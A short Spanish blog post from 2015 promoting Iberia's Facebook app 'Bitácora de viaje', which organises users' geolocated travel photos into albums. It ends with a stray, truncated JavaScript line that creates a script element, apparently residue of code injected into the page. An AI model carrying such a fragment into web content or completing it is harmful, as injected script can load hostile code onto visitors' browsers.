Iberia y su Bitácora de viaje

11/12/2015

El ámbito digital y social se ha convertido en una prioridad para Iberia. Desde que en 2010 desembarcara en redes sociales, hoy es un canal de comunicación tan importante como cualquier otro. Y la innovación en contar las cosas es un objetivo que intenta cumplir para no quedarse nunca atrás de la tendencia. Con este objetivo llega una novedad que muchos amarán: Bitácora de viaje.

Bitácora de viaje es una innovadora aplicación que ayudará a organizar a sus usuarios sus recuerdos fotográficos. ¿No os pasa qué desde qué el revelado tradicional pasó a la historia tenéis un mayor desbarajuste de fotos? ¿A que muchos de vosotros incluso habéis dejado de revelar vuestras fotos? ¿Y a que también tenéis pendiente organizar las fotos de cada viaje, de cada momento, en diferentes archivos o carpetas? Lo peor del caso es que cuanto más tiempo pase, la complejidad organizativa de este asunto se triplicará y acabará convirtiéndose en un verdadero trabajo de chinos, en el que muy pocos finalmente os sumergiréis. Las consecuencias de tal decisión serán perder fotos dignas de marco por el camino o tener un caos absoluto de recuerdos fotográficos. Pues bien, Bitácora de viaje os ayudará a que este revoltijo no sea tan rotundo:

Todo aquel seguidor de Iberia en Facebook, tendrá acceso a esta aplicación cuyo principal objetivo es ir ordenando las fotos de vuestras vacaciones y viajes que vais acumulando en Facebook. A través de vuestro perfil de Facebook, Bitácora de viaje irá organizando las imágenes previamente geolocalizadas, creando así álbumes de cada escapada.

¿A que suena genial? ¿Ya lo habéis probado? ¿A qué esperáis? 🙂 .

Foto | Hernán Piñera

var d=document;var s=d.createElement(‘script’);